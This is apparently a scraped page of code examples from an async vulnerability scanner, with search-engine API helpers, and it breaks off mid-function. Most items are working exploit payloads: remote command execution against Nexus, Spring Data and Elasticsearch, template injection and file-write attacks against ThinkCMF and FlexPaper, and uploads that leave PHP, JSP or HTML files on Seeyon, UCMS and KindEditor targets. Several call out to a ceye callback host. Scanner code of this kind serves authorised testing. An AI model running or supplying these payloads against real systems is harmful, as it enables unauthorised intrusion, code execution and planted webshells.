Пример #1
    async def prove(self):
        """Probe the target for an open (unauthenticated) proxy.

        Two transports are tried in turn, SOCKS5 first and plain HTTP
        second. Each one relays a request to the ceye URL callback returned
        by ``self.ceye_dns_api(t='url')``; the relay counts as open when the
        callback body contains ``'HTTP Record Insert Success'``. The first
        confirmed transport sets ``self.flag`` to 1, appends a result dict
        to ``self.res`` and ends the probe.
        """
        marker = 'HTTP Record Insert Success'

        def record(proxy_url):
            # Bookkeeping shared by both transports on a confirmed hit.
            self.flag = 1
            self.res.append({"info": proxy_url, "key": "proxy unauth"})

        # socks proxy
        proxy = 'socks5://{}:{}'.format(self.target_host, str(self.target_port))
        connector = SocksConnector.from_url(proxy)
        url = self.ceye_dns_api(t='url')
        async with ClientSession(connector=connector) as session:
            async with session.options(url=url) as res1:
                if res1 and marker in await res1.text():
                    record(proxy)
                    return

        # http proxy
        proxy = 'http://{}:{}'.format(self.target_host, str(self.target_port))
        async with ClientSession() as session:
            async with session.get(url=url, proxy=proxy) as res2:
                if res2 and marker in await res2.text():
                    record(proxy)
                    return
Пример #2
    async def prove(self):
        """Probe the target for an open (unauthenticated) proxy.

        SOCKS5 is tried first, then plain HTTP. Each transport fetches
        ``http://example.com/`` through the target; the relay counts as open
        when the body contains ``'More information...'``. The first confirmed
        transport sets ``self.flag`` to 1, appends a result dict to
        ``self.res`` and ends the probe.
        """
        url = 'http://example.com/'
        marker = 'More information...'

        def record(proxy_url):
            # Bookkeeping shared by both transports on a confirmed hit.
            self.flag = 1
            self.res.append({"info": proxy_url, "key": "proxy unauth"})

        # socks proxy
        proxy = 'socks5://{}:{}'.format(self.target_host, str(self.target_port))
        connector = SocksConnector.from_url(proxy)

        async with ClientSession(connector=connector) as session:
            async with session.get(url=url) as res1:
                if res1 and marker in await res1.text():
                    record(proxy)
                    return

        # http proxy
        proxy = 'http://{}:{}'.format(self.target_host, str(self.target_port))
        async with ClientSession() as session:
            async with session.get(url=url, proxy=proxy) as res2:
                if res2 and marker in await res2.text():
                    record(proxy)
                    return
Пример #3
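async def _zoomeye_api(search, page, z_type):
    """Yield ZoomEye search results one page at a time.

        app:"Drupal" country:"JP"
        curl -X POST https://api.zoomeye.org/user/login -d '
        {
        "username": "******",
        "password": "******"
        }'

    Args:
        search: ZoomEye query string.
        page: number of result pages to fetch (1-based, inclusive).
        z_type: ``'web'`` or ``'host'`` (case-insensitive); selects the API
            endpoint and how each page is parsed.

    Yields:
        For ``'web'``, the list of ``"url"`` values scraped from the response
        body; for ``'host'``, a list of ``'ip:port'`` strings. A page whose
        request or parsing fails yields ``[]``. An unknown ``z_type`` yields
        ``None`` once and then stops.

    Exits the process via ``sys.exit`` when the ``zoomeye_api`` config section
    is missing, the login response cannot be handled, or the API answers the
    search with HTTP 422 (rejected token).
    """
    headers = {}
    url_login = '******'
    try:
        data = {
            'username': conf['zoomeye_api']['username'],
            'password': conf['zoomeye_api']['password']
        }
        async with ClientSession() as session:
            async with session.post(url=url_login, json=data, headers=headers) as response:
                if response:
                    res = await response.text()
                    # The JWT is reused for every search request below.
                    headers["Authorization"] = "JWT " + json.loads(res)['access_token']
    except KeyError:
        # NOTE: a login reply without 'access_token' also lands here and is
        # reported as a config error.
        sys.exit(logger.error("Load tentacle config error: zoomeye_api, please check the config in tentacle.conf."))
    except AttributeError:
        sys.exit(logger.error("Zoomeye api error: the response is none."))
    except Exception as e:
        sys.exit(logger.error("Zoomeye api error: %s" % type(e).__name__))

    kind = z_type.lower()
    if kind == 'web':
        url_api = "https://api.zoomeye.org/web/search"
    elif kind == 'host':
        url_api = "https://api.zoomeye.org/host/search"
    else:
        logger.error("Error zoomeye api with type {0}.".format(z_type))
        yield None
        # Fix: previously execution fell through and queried url=None.
        return
    logger.sysinfo("Using zoomeye api with type {0}.".format(z_type))

    url_pattern = re.compile('"url": "(.*?)"')  # hoisted out of the page loop
    async with ClientSession() as session:
        for n in range(1, page + 1):
            logger.debug("Find zoomeye url of %d page..." % int(n))
            try:
                data = {'query': search, 'page': str(n)}
                async with session.get(url=url_api, params=data, headers=headers) as response:
                    if response:
                        res = await response.text()
                        if int(response.status) == 422:
                            sys.exit(logger.error("Error zoomeye api token."))
                        if kind == 'web':
                            result = url_pattern.findall(res)
                        else:
                            result = [str(item['ip']) + ':' + str(item['portinfo']['port'])
                                      for item in json.loads(res)['matches']]
                        logger.debug("Zoomeye Found: %s" % result)
                        yield result
            except Exception:
                # Best-effort per page: a failed page yields [] so the caller's
                # loop keeps going. SystemExit is not an Exception subclass, so
                # the 422 exit above still propagates.
                yield []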
Пример #4
 async def prove(self):
     """Check for the ThinkCMF 2.2.3 template-injection issue.

     For each candidate base path, POSTs ``_data`` to
     ``index.php?g=Api&m=Plugin&a=fetch`` and, on HTTP 200, fetches
     ``<path>/bytestforme2.php``; ``'php.ini'`` in that body is the hit
     condition. A hit sets ``self.flag`` and records ``url`` in ``self.req``
     and ``self.res``.

     NOTE(review): a successful check leaves ``bytestforme2.php`` on the
     target and nothing in this method removes it. The request path and that
     file name are usable as detection indicators.
     """
     await self.get_url()
     if self.base_url:
         # Deduplicate the two candidate roots.
         path_list = list(
             set([
                 self.url_normpath(self.base_url, '/'),
                 self.url_normpath(self.url, './'),
             ]))
         async with ClientSession() as session:
             for path in path_list:
                 url = path + "index.php?g=Api&m=Plugin&a=fetch"
                 _data = "templateFile=/../../../public/index&prefix=''&content=<php>file_put_contents('bytestforme2.php','<?php phpinfo();')</php>"
                 async with session.post(url=url, data=_data) as res:
                     # `res != None`: aiohttp responses are objects; `is not None` is the idiom.
                     if res != None and res.status == 200:
                         async with session.get(url=path +
                                                "/bytestforme2.php") as res:
                             if res != None and res.status == 200:
                                 text = await res.text()
                                 if 'php.ini' in text:
                                     self.flag = 1
                                     self.req.append({"flag": url})
                                     self.res.append({
                                         "info":
                                         url,
                                         "key":
                                         "thinkcmf 2.2.3 template inject"
                                     })
Пример #5
 async def prove(self):
     """Out-of-band (DNS callback) check recorded as CVE-2019-7238.

     For each candidate root, POSTs ``data`` to ``service/extdirect``, waits
     one second and asks ``self.ceye_verify_api`` whether the ``dns`` token
     was resolved. The HTTP response itself is never inspected; a resolved
     token sets ``self.flag``, appends to ``self.res`` and returns.

     NOTE(review): the ceye label ``k='cve20197328'`` does not match the
     result key ``"CVE-2019-7238"``; the key is the one reported to callers.
     """
     await self.get_url()
     if self.base_url:
         path_list = list(
             set([
                 self.url_normpath(self.base_url, '/'),
                 self.url_normpath(self.base_url, '/nexus3/'),
             ]))
         async with ClientSession() as session:
             for path in path_list:
                 url = path + 'service/extdirect'
                 headers = {"Content-Type": "application/json"}
                 dns = self.ceye_dns_api(k='cve20197328', t='dns')
                 cmd = 'ping ' + dns
                 data = '{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":25,"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"1.class.forName(\'java.lang.Runtime\').getRuntime().exec(' + cmd + ').waitFor()".format(self.BANNER, self.DOMAIN)},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":4}'
                 async with session.post(url=url,
                                         json=data,
                                         headers=headers) as res:
                     # Verification is purely out-of-band: any resolver that
                     # looks up the token (e.g. a logging proxy) also satisfies
                     # it, so treat a hit as a lead, not proof.
                     await asyncio.sleep(1)
                     if await self.ceye_verify_api(dns, t='dns'):
                         self.flag = 1
                         self.res.append({
                             "info": url,
                             "key": "CVE-2019-7238"
                         })
                         return
Пример #6
    async def prove(self):
        """Check for the WebLogic console path-traversal issue CVE-2020-14750.

        Requests ``console/css/%252e%252e%252fconsole.portal`` without
        following redirects. A 302 is expected first; the same URL is then
        re-requested with the cookies from that reply, and any non-404 body
        carrying the console markers below sets ``self.flag``, appends to
        ``self.res`` and returns.

        Detection: the double-encoded ``%252e%252e%252f`` segment under
        ``/console/css/`` is the request-side indicator.
        """
        await self.get_url()
        if self.base_url:
            headers = {'Content-Type': 'application/x-www-form-urlencoded'}
            url = self.base_url + 'console/css/%252e%252e%252fconsole.portal'
            async with ClientSession() as session:
                async with session.get(url=url,
                                       headers=headers,
                                       allow_redirects=False) as res:
                    if res != None and res.status == 302:
                        cookies = res.cookies
                        async with session.get(url=url,
                                               cookies=cookies,
                                               headers=headers,
                                               allow_redirects=False) as res:
                            if res != None and res.status != 404:
                                text = await res.text()
                                # Note the precedence: `and` binds tighter than
                                # `or`, so the second group is
                                # 'Home Page' OR ('WebLogic Server Console' AND 'console.portal').
                                if ('base_domain' in text and
                                        'SecurityRealmRealmTablePage' in text
                                    ) or ('Home Page' in text
                                          or 'WebLogic Server Console' in text
                                          and 'console.portal' in text):

                                    self.flag = 1
                                    self.res.append({
                                        "info":
                                        url,
                                        "key":
                                        "weblogic CVE-2020-14750"
                                    })
                                    return
Пример #7
    async def prove(self):
        """Check for Spring Data Commons CVE-2018-1273 (SpEL in property paths).

        For each candidate path, sends up to three ``username[...]`` bodies
        with GET (``session.get(..., data=...)`` — a GET carrying a body is
        unusual and some servers drop it) and looks for ``"spring_test"`` in
        the reply. A hit sets ``self.flag`` and appends ``path`` to
        ``self.res``.

        NOTE(review): the ``break`` only leaves the inner ``for _data`` loop,
        so the outer loop continues and ``self.res`` may receive one entry per
        candidate path.
        """
        await self.get_url()
        if self.base_url:
            path_list = list(
                set([
                    self.url_normpath(self.base_url, '/'),
                    self.url_normpath(self.url, './'),
                    self.url_normpath(self.url, '')
                ]))
            async with ClientSession() as session:
                for path in path_list:
                    datas = [
                        'username[(#root.getClass().forName("java.lang.ProcessBuilder").getConstructor(\'foo\'.split('
                        ').getClass()).newInstance(\'ecxxho%20springxx_test\'.split(\'xx\'))).start()]=test',
                        'username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\'echo%20spring_test\')")]=test',
                        'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("echo%20spring_test")]=test'
                    ]
                    for _data in datas:
                        async with session.get(
                                url=path,
                                data=_data,
                        ) as res:
                            if res:
                                text = await res.text()

                                if "spring_test" in text:
                                    self.flag = 1
                                    self.res.append({
                                        "info":
                                        path,
                                        "key":
                                        "Spring RCE CVE-2018-1273"
                                    })
                                    break
Пример #8
    async def prove(self):
        """Check whether WordPress ``xmlrpc.php`` pingback can be used for SSRF.

        For each candidate root, POSTs a ``pingback.ping`` XML-RPC call whose
        source URL points at the ceye ``dns`` token, waits one second and
        asks ``self.ceye_verify_api`` whether the token resolved. A hit sets
        ``self.flag``, records ``url`` in ``self.req``/``self.res`` and stops.

        Detection/mitigation: a ``pingback.ping`` call with an external
        source URL is the request-side indicator; disabling XML-RPC pingbacks
        removes the vector.
        """
        await self.get_url()
        if self.base_url:
            path_list = list(
                set([
                    self.url_normpath(self.base_url, '/'),
                    self.url_normpath(self.base_url, '../wordpress/'),
                    self.url_normpath(self.url, './'),
                ]))
            async with ClientSession() as session:
                for path in path_list:
                    dns = self.ceye_dns_api(k='xmlrpc', t='dns')
                    url = path + 'xmlrpc.php'
                    headers = {"Content-Type": "text/xml"}
                    # Triple-quoted body is intentionally at column 0.
                    data = '''<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://{dns}/</string></value></param>
<param><value><string>{path}?p=1</string></value></param>
</params>
</methodCall>'''.format(dns=dns, path=path)
                    async with session.post(url=url,
                                            data=data,
                                            headers=headers) as res:
                        if res != None:
                            # Out-of-band verification only; the XML-RPC reply is not parsed.
                            await asyncio.sleep(1)
                            if await self.ceye_verify_api(dns, 'dns'):
                                self.flag = 1
                                self.req.append({"url": url})
                                self.res.append({
                                    "info": url,
                                    "key": "wordpress xmlrpc ssrf"
                                })
                                break
Пример #9
 async def prove(self):
     """Check the Seeyon ``htmlofficeservlet`` unauthenticated file write.

     GETs ``seeyon/htmlofficeservlet`` and, if the banner ``'DBSTEP V3.0'``
     is present, POSTs a DBSTEP body whose ``FILENAME`` is a path encoded
     with ``base64encode`` and the custom alphabet ``table``. It then GETs
     ``seeyon/<test_file>`` and looks for ``'this is a test for me'``. A hit
     sets ``self.flag`` and appends ``url1`` to ``self.res``.

     NOTE(review): ``test_file`` (``testNNNNNN.txt``) is left on the target;
     nothing here removes it.
     """
     await self.get_url()
     if self.base_url:
         # Custom base64 alphabet expected by the servlet's DBSTEP format.
         table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'
         test_file = 'test' + str(random.randint(100000, 999999)) + '.txt'
         base64_file = str(
             base64encode(
                 '..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format(
                     test_file), table))
         url = self.base_url + 'seeyon/htmlofficeservlet'
         async with ClientSession() as session:
             async with session.get(url=url) as response:
                 if response != None:
                     text = await response.text()
                     if 'DBSTEP V3.0' in text:
                         data = '''DBSTEP V3.0     355             0               22             DBSTEP=OKMLlKlV\r\nOPTION=S3WYOSWLBSGr\r\ncurrentUserId=zUCTwigsziCAPLesw4gsw4oEwV66\r\nCREATEDATE=wUghPB3szB3Xwg66\r\nRECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6\r\noriginalFileId=wV66\r\noriginalCreateDate=wUghPB3szB3Xwg66\r\nFILENAME={}\r\nneedReadFile=yRWZdAS6\r\noriginalCreateDate=wLSGP4oEzLKAz4=iz=66 \r\nthis is a test for me.f82abdd62cce9d2841a6efd5663e7bee'''.format(
                             base64_file)
                         # The upload reply is ignored; only the follow-up GET decides.
                         async with session.post(url=url,
                                                 data=data) as response2:
                             # print(self.base_url +  'seeyon/' + test_file)
                             await asyncio.sleep(1)
                         url1 = self.base_url + 'seeyon/' + test_file
                         async with session.get(url=url1) as response2:
                             if response2 != None:
                                 text2 = await response2.text()
                                 if 'this is a test for me' in text2:
                                     self.flag = 1
                                     self.res.append({
                                         "info":
                                         url1,
                                         "key":
                                         'seeyon getshell'
                                     })
Пример #10
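async def _google_api(search, page):
    '''
        https://console.developers.google.com
        https://developers.google.com/custom-search/v1/cse/list
        poc-t search_enging 011385053819762433240:ljmmw2mhhau
        https://cse.google.com.hk/cse?cx=011385053819762433240:ljmmw2mhhau&gws_rd=cr

    Yield result links from the Google Custom Search JSON API.

    Args:
        search: query string.
        page: number of 10-result pages to fetch.

    Yields:
        The ``link`` of each result item, page by page. Stops at the first
        page that returns no items or a non-200 status.

    Exits via ``sys.exit`` when the ``google_api`` config section is missing.
    '''
    try:
        developer_key = conf['google_api']['developer_key']
        search_enging = conf['google_api']['search_enging']
    except KeyError:
        sys.exit(logger.error("Load tentacle config error: google_api, please check the config in tentacle.conf."))
    base_url = 'https://www.googleapis.com/customsearch/v1'
    async with ClientSession() as session:
        for p in range(0, page):
            # Pass the query through ``params`` so ``search`` is URL-encoded
            # instead of being spliced raw into the query string.
            params = {
                'cx': search_enging,
                'key': developer_key,
                'num': '10',
                'start': str(p * 10 + 1),
                'q': search,
            }
            async with session.get(url=base_url, params=params) as response:
                if response:
                    res = await response.text()
                    if int(response.status) != 200:
                        logger.error("Error google api access, and api rate limit 100/day, maybe you should pay money and enjoy service.")
                        break
                    # 'items' is absent on an empty page; the original bare
                    # ``except`` hid that case together with every other error.
                    items = json.loads(res).get('items') or []
                    if not items:
                        break
                    for item in items:
                        yield item.get('link')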
Пример #11
 async def prove(self):
     """Check the UCMS ``uploadpic_html.jsp`` unauthenticated upload.

     For each candidate root, POSTs ``xmldata`` to
     ``cms/client/uploadpic_html.jsp?toname=justfortest.jsp&diskno=xxxx``
     and, on HTTP 200, requests
     ``cms-data/temp_dir/xxxx/temp.files/justfortest.jsp``; the base64 body
     decodes to ``'test by me'``, which is the hit marker. A hit sets
     ``self.flag`` and records ``myurl`` in ``self.req``/``self.res``.

     NOTE(review): ``justfortest.jsp`` is left on the target; nothing here
     removes it.
     """
     await self.get_url()
     if self.base_url:
         xmldata = '''
         <?xml version="1.0" encoding="UTF-8"?>
         <root>
         dGVzdCBieSBtZQ==
         </root>
         '''
         path_list = list(
             set([
                 self.url_normpath(self.base_url, '/'),
                 self.url_normpath(self.base_url, '../ucms/'),
                 self.url_normpath(self.url, 'ucms/'),
                 self.url_normpath(self.url, '../ucms/'),
             ]))
         async with ClientSession() as session:
             for path in path_list:
                 myurl = path + 'cms/client/uploadpic_html.jsp?toname=justfortest.jsp&diskno=xxxx'
                 async with session.post(url=myurl, data=xmldata) as res:
                     # BUG: `is 200` compares identity, not value; it only works
                     # because CPython interns small ints. Should be `== 200`.
                     if res != None and res.status is 200:
                         myurl = path + 'cms-data/temp_dir/xxxx/temp.files/justfortest.jsp'
                         async with session.post(url=myurl,
                                                 data=xmldata) as res:
                             if res != None:
                                 text = await res.text()
                                 if 'test by me' in text:
                                     self.flag = 1
                                     self.req.append({"page": myurl})
                                     self.res.append({
                                         "info": myurl,
                                         "key": "ucms upload"
                                     })
Пример #12
 async def prove(self):
     """Check the FlexPaper 2.3.6 ``setup.php`` file-write issue.

     Three-step probe per candidate root: POST ``payload`` to
     ``flexpaper/php/change_config.php`` (HTTP 200 required), GET
     ``flexpaper/php/setup.php?step=2&PDF2SWF_PATH=<shellcode>`` (HTTP 200
     required), then GET ``flexpaper/php/testforme.php`` and look for
     ``"php.ini"``. A hit sets ``self.flag``, records ``url3`` in
     ``self.req``/``self.res`` and returns.

     NOTE(review): ``testforme.php`` is left on the target; nothing here
     removes it. The ``PDF2SWF_PATH`` query parameter carrying a
     percent-encoded blob is the request-side indicator.
     """
     await self.get_url()
     if self.base_url:
         path_list = list(set([
             self.url_normpath(self.base_url, '/'),
             self.url_normpath(self.url, './'),
         ]))
         async with ClientSession() as session:
             for path in path_list:
                 # Tuple of pairs is accepted by aiohttp as form data.
                 payload = (
                     ("SAVE_CONFIG", "1"), ("PDF_Directory", "/var/www/html/flex2.3.6/flexpaper/pdf"),
                     ("SWF_Directory", "config/"),
                     ("LICENSEKEY", ""), ("splitmode", "1"), ("RenderingOrder_PRIM", "flash"), ("RenderingOrder_SEC", "html"))
                 shellcode = "%65%63%68%6f%20%50%44%39%77%61%48%41%67%63%47%68%77%61%57%35%6d%62%79%67%70%4f%7a%38%2b%20%7c%62%61%73%65%36%34%20%2d%64%20%3e%24%28%70%77%64%29%2f%74%65%73%74%66%6f%72%6d%65%2e%70%68%70"
                 url1 = path + "flexpaper/php/change_config.php"
                 url2 = path + "flexpaper/php/setup.php?step=2&PDF2SWF_PATH=" + shellcode
                 url3 = path + 'flexpaper/php/testforme.php'
                 async with session.post(url=url1, data=payload) as res1:
                     if res1 != None and res1.status == 200:
                         async with session.get(url=url2) as res2:
                             if res2 != None and res2.status == 200:
                                 async with session.get(url=url3) as res3:
                                     if res3 != None:
                                         text3 = await res3.text()
                                         if "php.ini" in text3:
                                             self.flag = 1
                                             self.req.append({"url": url3})
                                             self.res.append({"info": url3, "key": "flexpaper_236_getshell"})
                                             return
Пример #13
 async def prove(self):
     """Check the Discuz! X3.4 wechat-plugin SSRF via the ``avatar`` parameter.

     For each candidate root, GETs
     ``plugin.php?id=wechat:wechat&ac=wxregister&username=vov&avatar=<dns>&wxopenid=<random>``
     with ``avatar`` set to the ceye URL token, waits one second and asks
     ``self.ceye_verify_api`` whether the token was fetched. A hit sets
     ``self.flag`` and records ``url`` in ``self.req``/``self.res``.

     Detection: an ``ac=wxregister`` request whose ``avatar`` points at an
     external host is the request-side indicator.
     """
     await self.get_url()
     if self.base_url:
         path_list = list(
             set([
                 self.url_normpath(self.base_url, '/'),
                 self.url_normpath(self.url, './'),
             ]))
         async with ClientSession() as session:
             for path in path_list:
                 dns = self.ceye_dns_api(t='url')
                 # wxopenid is 8 random lowercase letters; it only needs to be unique per run.
                 url = path + "plugin.php?id=wechat:wechat&ac=wxregister&username=vov&avatar=%s&wxopenid=%s" % (
                     dns, ''.join(
                         [random.choice(ascii_lowercase)
                          for _ in range(8)]))
                 async with session.get(url=url) as res:
                     if res != None:
                         # Out-of-band verification only; the HTML reply is not parsed.
                         await asyncio.sleep(1)
                         if await self.ceye_verify_api(dns, 'http'):
                             self.flag = 1
                             self.req.append({"flag": url})
                             self.res.append({
                                 "info": url,
                                 "key": "discuz x3.4 ssrf"
                             })
Пример #14
 async def prove(self):
     """Check KindEditor's ``upload_json.php`` for unrestricted file upload.

     For each candidate root, POSTs a multipart ``imgFile`` field named
     ``mytestforyou.html`` to ``kindeditor/php/upload_json.php?dir=file`` and
     treats a JSON reply whose ``url`` contains ``'kindeditor'`` as a hit,
     setting ``self.flag`` and recording ``url`` in ``self.req``/``self.res``.

     NOTE(review): ``mytestforyou.html`` is left on the target; nothing here
     removes it. The result ``"key"`` is the URL itself rather than a label,
     unlike the other checks on this page.
     """
     await self.get_url()
     if self.base_url:
         path_list = list(
             set([
                 self.url_normpath(self.base_url, '/'),
                 self.url_normpath(self.url, './'),
                 self.url_normpath(self.url, '../'),
             ]))
         async with ClientSession() as session:
             for path in path_list:
                 url = path + "kindeditor/php/upload_json.php?dir=file"
                 data = FormData()
                 data.add_field('imgFile',
                                "this is a test for you. ",
                                filename='mytestforyou.html',
                                content_type='text/plain')
                 async with session.post(url=url, data=data) as res:
                     if res != None:
                         text = await res.text()
                         # `res` is rebound from the response object to the parsed JSON below.
                         try:
                             res = json.loads(text)
                             if 'url' in res.keys(
                             ) and 'kindeditor' in res['url']:
                                 self.flag = 1
                                 self.req.append({"url": url})
                                 self.res.append({"info": url, "key": url})
                         # Bare except: a non-JSON reply (and any other error)
                         # is silently treated as "no hit".
                         except:
                             pass
Пример #15
 async def prove(self):
     '''
     Check for Elasticsearch CVE-2015-1427 (Groovy ``script_fields``).

     POSTs ``_data`` to ``<base_url>_search?pretty`` and looks for the random
     marker ``ran`` in the reply body; a hit sets ``self.flag`` and records
     ``url`` in ``self.req``/``self.res``.

     The Java equivalent of the script is:
     String s1 = new java.util.Scanner(Runtime.getRuntime().exec("ipconfig").getInputStream()).useDelimiter("\\A").next();
     //A means "start of string", and \z means "end of string".
     String s2  = new java.util.Scanner(Runtime.getRuntime().exec("ipconfig").getInputStream()).next();
     System.out.println(s1)
     '''
     await self.get_url()
     if self.base_url:
         # Random marker so a real reply cannot be confused with a cached one.
         ran = str(random.randint(100000, 999999))
         headers = {
             'Content-Type': 'application/x-www-form-urlencoded'
         }
         _data = '''
         {
             "size":1,
             "script_fields": {
                 "test#": {
                     "script":
                         "java.lang.Math.class.forName(\\"java.io.BufferedReader\\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"echo '''+ ran + '''\\").getInputStream())).readLines()",
                     "lang": "groovy"
                 }
             }
         }
         '''
         async with ClientSession() as session:
             url = self.base_url + '_search?pretty'
             async with session.post(url=url, headers=headers, data=_data) as res:
                 if res != None:
                     text = await res.text()
                     if ran in text:
                         self.flag = 1
                         self.req.append({"url": url})
                         self.res.append({"info": url, "key": "CVE-2015-1427"})
Пример #16
 async def prove(self):
     """Check the WebLogic ``ws_utc`` keystore upload, recorded as CVE-2018-2894.

     Uses ``self.get_new_work_path`` and ``self.set_new_upload_path`` (defined
     outside this block) to prepare an upload directory, then POSTs a
     multipart keystore form with ``prove_content`` as ``myTestFile.txt``
     to ``ws_utc/resources/setting/keystore``. The ``<id>`` from the reply
     is used to GET ``ws_utc/css/config/keystore/<id>_myTestFile.txt``; a
     body containing ``upload_content`` is a hit.

     NOTE(review): ``prove_content``, ``upload_content`` and ``headers`` are
     not defined in this method — presumably module-level; confirm that
     ``upload_content`` is the text inside ``prove_content``, otherwise the
     final check can never match. The uploaded file is left on the target.
     """
     await self.get_url()
     if self.base_url:
         path = self.base_url
         async with ClientSession() as session:
             new_path = await self.get_new_work_path(session, path)
             flag = await self.set_new_upload_path(session, path, new_path)
             if flag:
                 form = aiohttp.FormData()
                 form.add_field('ks_edit_mode', 'false')
                 form.add_field('ks_password_front', 'mytest')
                 form.add_field('ks_password_changed', 'true')
                 form.add_field('ks_filename', prove_content, filename="myTestFile.txt",content_type='application/octet-stream')
                 async with session.post(url=path + "ws_utc/resources/setting/keystore", data=form) as res:
                     if res:
                         text = await res.text()
                         # The last <id> in the reply is taken as the new keystore id.
                         match = re.findall("<id>(.*?)</id>", text)
                         if match:
                             tid = match[-1]
                             shell_path = self.base_url + "ws_utc/css/config/keystore/" + str(tid) + "_myTestFile.txt"
                             async with session.get(url=shell_path, headers=headers) as res:
                                 if res:
                                     text = await res.text()
                                     if upload_content in text:
                                         self.flag = 1
                                         self.res.append({"info": shell_path, "key": "CVE-2018-2894"})
Пример #17
 async def prove(self):
     """DNS-callback check for JSON ``@type`` deserialization (Inet4/6Address).

     Posts two JSON documents whose ``@type`` is ``java.net.Inet4Address`` /
     ``java.net.Inet6Address`` with ``val`` set to the ceye ``dns`` token,
     then asks ``self.ceye_verify_api`` whether the token resolved. A hit
     sets ``self.flag`` and appends to ``self.res``; the result ``"key"`` is
     the dns token rather than a label.

     NOTE(review): elsewhere on this page ``self.url_normpath(...)`` is used
     as a single string, so ``for url in self.url_normpath(...)`` most likely
     iterates that string's characters; each post then fails and is swallowed
     by the bare ``except``, and ``url`` after the loop is the last character
     (or unbound if the string is empty). Confirm against ``url_normpath``.
     """
     await self.get_url()
     if self.base_url:
         dns = self.ceye_dns_api(k='fjinfo', t='dns')
         # logger.sysinfo(dns + ' ------- '+  self.base_url)
         async with ClientSession() as session:
             pocs = [
                 {
                     "test": {
                         "@type": "java.net.Inet4Address",
                         "val": dns
                     }
                 },
                 {
                     "test": {
                         "@type": "java.net.Inet6Address",
                         "val": dns
                     }
                 },
             ]
             for poc in pocs:
                 for url in self.url_normpath(self.url, './'):
                     try:
                         async with session.post(url=url, json=poc) as res:
                             pass
                     # Bare except hides connection errors and bad URLs alike.
                     except:
                         pass
             if await self.ceye_verify_api(dns, 'dns'):
                 self.flag = 1
                 self.res.append({"info": url, "key": dns})
Пример #18
async def _fofa_api(search, page, flag = True):
    '''
    Async generator yielding the first field of every FOFA search result.

    API reference: https://fofa.so/api#auth

    :param search: FOFA query; base64-encoded via ``base64encode`` before sending.
    :param page: number of result pages to walk, 1..page inclusive.
    :param flag: when True, log ``"Using fofa api..."`` once before querying.
    :yields: ``item[0]`` of each result row, in the order the API returns them.

    Terminates the whole process via ``sys.exit`` when the ``fofa_api`` section
    is missing from ``conf`` or the API answers HTTP 401. Stops after the first
    page whose ``results`` list is empty.
    '''
    # NOTE(review): the endpoint literal is shown redacted on this page ('******');
    # the real URL has to come from the project configuration, not from here.
    url_login = '******'
    try:
        email = conf['fofa_api']['email']
        key = conf['fofa_api']['token']
    except KeyError:
        # NOTE(review): sys.exit() receives logger.error's return value as the exit
        # status; if that is None the process exits 0 despite the error -- confirm.
        sys.exit(logger.error("Load tentacle config error: zfofa_api, please check the config in tentacle.conf."))
    if flag:
        logger.sysinfo("Using fofa api...")

    # NOTE(review): if base64encode returns bytes, str() yields the "b'...'" repr
    # rather than the encoded text -- confirm the helper returns str.
    search = str(base64encode(search))

    async with ClientSession() as session:
        for p in range(1,page+1):
            logger.debug("Find fofa url of %d page..." % int(p))
            # The account email and API key travel in the query string, so they end up
            # in anything that records request URLs (proxies, access logs, tracing).
            # The base64 query is interpolated raw; standard base64 '+' and '/' are
            # not URL-safe -- confirm base64encode's alphabet.
            async with session.post(url=url_login + '?email={0}&key={1}&page={2}&qbase64={3}'.format(email, key,p, search)) as response:
                if response !=None:
                    if int(response.status) == 401:
                        sys.exit(logger.error("Error fofa api access, maybe you should pay fofa coin and enjoy service."))
                    else:
                        res = await response.text()
                        if res !=None:
                            res_json = json.loads(res)
                            # NOTE(review): a non-null "error" field is silently ignored (no log,
                            # page skipped), and a response without "results" raises TypeError
                            # on len(None).
                            if res_json["error"] is None:
                                if len(res_json.get('results')) == 0:
                                    break
                                for item in res_json.get('results'):
                                    logger.debug("Fofa Found: %s" % item[0])
                                    yield item[0]
 async def upload(self):
     """Seeyon ``htmlofficeservlet`` upload probe (destructive: writes a file).

     Flow: GET the servlet and require the ``'DBSTEP V3.0'`` marker in the
     response; POST a DBSTEP-framed body carrying a JSP page under a random
     ``test<6 digits>.jsp`` name; wait one second; GET ``seeyon/<that file>``
     and treat a body containing ``':-)'`` as success. On success sets
     ``self.flag = 1`` and appends the page URL (with its query parameters) to
     ``self.res``. Requires ``self.base_url`` from ``self.get_url()``.

     NOTE(review): the uploaded file is never deleted, so a successful run
     leaves an executable artifact on the target.
     """
     await self.get_url()
     if self.base_url:
         # Passed as the second argument to base64encode -- presumably a custom
         # 64-character alphabet for the FILENAME field; confirm against the helper.
         table = 'gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6'
         # Random suffix, presumably so repeated runs do not collide on the target.
         test_file = 'test' + str(random.randint(100000, 999999)) + '.jsp'
         base64_file = str(
             base64encode(
                 '..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\{}'.format(
                     test_file), table))
         url = self.base_url + 'seeyon/htmlofficeservlet'
         async with ClientSession() as session:
             async with session.get(url=url) as response:
                 if response != None:
                     text = await response.text()
                     # Fingerprint gate: only a servlet answering with the DBSTEP banner is probed further.
                     if 'DBSTEP V3.0' in text:
